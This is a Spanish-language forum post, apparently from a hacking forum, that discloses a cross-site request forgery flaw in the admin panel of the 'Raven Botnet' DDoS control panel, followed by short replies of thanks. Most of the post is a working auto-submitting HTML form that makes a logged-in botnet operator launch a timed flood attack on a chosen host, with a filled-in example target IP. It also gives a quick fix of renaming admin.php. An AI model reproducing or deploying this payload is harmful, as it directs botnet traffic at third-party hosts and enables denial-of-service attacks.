CSRF Raven Botnet

Bueno pues hola a todos, he encontrado varios CSRF en la Raven Botnet, uno de ellos está en la parte del ataque:

<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
	<form name="csrf" action="URL DONDE SE ENCUENTRA LA BOTNET/admin.php" method="post">
		<input type="hidden" name="target" value="HOST / IP QUE QUEREMOS ATACAR">
		<input type="hidden" name="time" value="TIEMPO EN SEGUNDOS">
		<input type="hidden" name="start" value="Attack!">
	</form>
</body>
</html>

Tendrían que editar todo lo que está en mayúscula, les mostraré el mismo código con un ejemplo:

<html>

<!-- CSRF Raven botnet, by Metadato -->

<body onload="document.csrf.submit();">
	<form name="csrf" action="http://ravenbotnet.com/admin.php" method="post">
		<input type="hidden" name="target" value="173.194.34.248">
		<input type="hidden" name="time" value="500">
		<input type="hidden" name="start" value="Attack!">
	</form>
</body>
</html>

Tambien podrían ocultar este script con un pequeño fake, pero como la intención de este post es que se fixeen los CSRF's, no se lo mostraré.
Bueno tambien voy a ser sincero, ¿cuantos de ustedes muestran la url donde esta su Raven Botnet? Creo que ninguno, quien lo haga no es muy recomendable, y más en este caso.

Bueno si quieren solucionar esto de forma rápida (aunque algo chapucera), puede cambiar el nombre de admin.php por otro nombre y en el index.php, en la línea 10:

echo '<META HTTP-EQUIV="Refresh" CONTENT="0; URL=admin.php">';

Le cambian el admin.php por el nombre que le pusieron y listo, también pueden montar la Raven de forma local. Espero que [Q]3rV[0] atienda este mensaje.

Un saludo 

Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Muy buen csrf, y el detalle de reportarlo muchisimo mejor.

Saludos!

Gracias Pekador, un saludo compa.